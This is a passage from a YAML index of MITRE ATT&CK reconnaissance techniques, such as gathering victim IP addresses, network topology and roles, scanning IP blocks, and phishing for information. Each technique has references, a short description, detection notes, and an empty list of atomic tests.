protections (ex: card/biometric readers, dedicated encryption hardware, etc.). + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). + id: attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:53:03.353Z' + created: '2020-10-02T16:40:47.488Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.005 + url: https://attack.mitre.org/techniques/T1590/005 + - source_name: WHOIS + url: https://www.whois.net/ + description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: IP Addresses + description: |- + Before compromising a victim, adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:03:29.213Z' + created: '2020-10-02T15:59:11.695Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1591.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1591.003 + url: https://attack.mitre.org/techniques/T1591/003 + - source_name: ThreatPost Broadvoice Leak + url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/ + description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, + Personal Voicemail Transcripts. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Identify Business Tempo + description: |- + Before compromising a victim, adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)) + id: attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:10:12.352Z' + created: '2020-10-02T16:34:32.435Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1591.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1591.004 + url: https://attack.mitre.org/techniques/T1591/004 + - source_name: ThreatPost Broadvoice Leak + url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/ + description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, + Personal Voicemail Transcripts. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Identify Roles + description: |- + Before compromising a victim, adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:10:36.279Z' + created: '2020-10-02T16:37:30.015Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.006 + url: https://attack.mitre.org/techniques/T1590/006 + - source_name: Nmap Firewalls NIDS + url: https://nmap.org/book/firewalls.html + description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls + and Intrusion Detection Systems. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Security Appliances + description: |- + Before compromising a victim, adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:04:13.578Z' + created: '2020-10-02T16:01:35.350Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.004 + url: https://attack.mitre.org/techniques/T1590/004 + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Topology + description: |- + Before compromising a victim, adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:04:40.188Z' + created: '2020-10-02T15:49:03.815Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1590.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1590.003 + url: https://attack.mitre.org/techniques/T1590/003 + - source_name: Pentesting AD Forests + url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019 + description: García, C. (2019, April 3). Pentesting Active Directory Forests. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Trust Dependencies + description: |- + Before compromising a victim, adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. + + Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:05:03.816Z' + created: '2020-10-02T15:47:59.457Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1598: + technique: + external_references: + - source_name: mitre-attack + external_id: T1598 + url: https://attack.mitre.org/techniques/T1598 + - source_name: ThreatPost Social Media Phishing + url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/ + description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching + Pad For Phishing Attacks. Retrieved October 20, 2020.' + - source_name: TrendMictro Phishing + url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html + description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved + October 20, 2020. + - source_name: PCMag FakeLogin + url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages + description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations + Staffers With Fake Login Pages. Retrieved October 20, 2020. + - source_name: Sophos Attachment + url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/ + description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without + links – when phishers bring along their own web pages. Retrieved October + 20, 2020.' + - source_name: GitHub Phishery + url: https://github.com/ryhanson/phishery + description: Ryan Hanson. (2016, September 24). phishery. Retrieved October + 23, 2020. + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Phishing for Information + description: |- + Before compromising a victim, adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. + + All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. + + Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + id: attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-25T19:44:58.292Z' + created: '2020-10-02T17:07:01.502Z' + x_mitre_contributors: + - Sebastian Salla, McAfee + - Robert Simmons, @MalwareUtkonos + x_mitre_data_sources: + - Social media monitoring + - Mail server + - Email gateway + x_mitre_detection: |- + Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + + When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. + + Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts). + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1597.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1597.002 + url: https://attack.mitre.org/techniques/T1597/002 + - source_name: ZDNET Selling Data + url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/ + description: Cimpanu, C. (2020, May 9). A hacker group is selling more than + 73 million user records on the dark web. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Purchase Technical Data + description: |- + Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. + + Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + id: attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:15:26.840Z' + created: '2020-10-02T17:05:43.562Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596.005 + url: https://attack.mitre.org/techniques/T1596/005 + - source_name: Shodan + url: https://shodan.io + description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scan Databases + description: |- + Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan) + + Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + id: attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:20:18.786Z' + created: '2020-10-02T17:00:44.586Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1595.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1595.001 + url: https://attack.mitre.org/techniques/T1595/001 + - source_name: Botnet Scan + url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf + description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from + a Botnet. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scanning IP Blocks + description: |- + Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. + + Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:06:09.139Z' + created: '2020-10-02T16:54:23.193Z' + x_mitre_data_sources: + - Packet capture + - Network device logs + x_mitre_detection: |- + Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). + + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1597: + technique: + external_references: + - source_name: mitre-attack + external_id: T1597 + url: https://attack.mitre.org/techniques/T1597 + - source_name: D3Secutrity CTI Feeds + url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/ + description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat + Intelligence Feeds. Retrieved October 20, 2020. + - source_name: ZDNET Selling Data + url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/ + description: Cimpanu, C. (2020, May 9). A hacker group is selling more than + 73 million user records on the dark web. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Search Closed Sources + description: |- + Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data) + + Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:15:53.892Z' + created: '2020-10-02T17:01:42.558Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1593.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1593.002 + url: https://attack.mitre.org/techniques/T1593/002 + - source_name: SecurityTrails Google Hacking + url: https://securitytrails.com/blog/google-hacking-techniques + description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques. + Retrieved October 20, 2020. + - source_name: ExploitDB GoogleHacking + url: https://www.exploit-db.com/google-hacking-database + description: Offensive Security. (n.d.). Google Hacking Database. Retrieved + October 23, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Search Engines + description: |- + Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + + Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:22:11.245Z' + created: '2020-10-02T16:50:12.809Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596 + url: https://attack.mitre.org/techniques/T1596 + - source_name: WHOIS + url: https://www.whois.net/ + description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. + - source_name: DNS Dumpster + url: https://dnsdumpster.com/ + description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020. + - source_name: Circl Passive DNS + url: https://www.circl.lu/services/passive-dns/ + description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS. + Retrieved October 20, 2020. + - source_name: Medium SSL Cert + url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2 + description: Jain, M. (2019, September 16). Export & Download — SSL Certificate + from Server (Site URL). Retrieved October 20, 2020. + - source_name: SSLShopper Lookup + url: https://www.sslshopper.com/ssl-checker.html + description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020. + - source_name: DigitalShadows CDN + url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/ + description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery + Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What + You Can Do About It. Retrieved October 20, 2020. + - source_name: Shodan + url: https://shodan.io + description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: 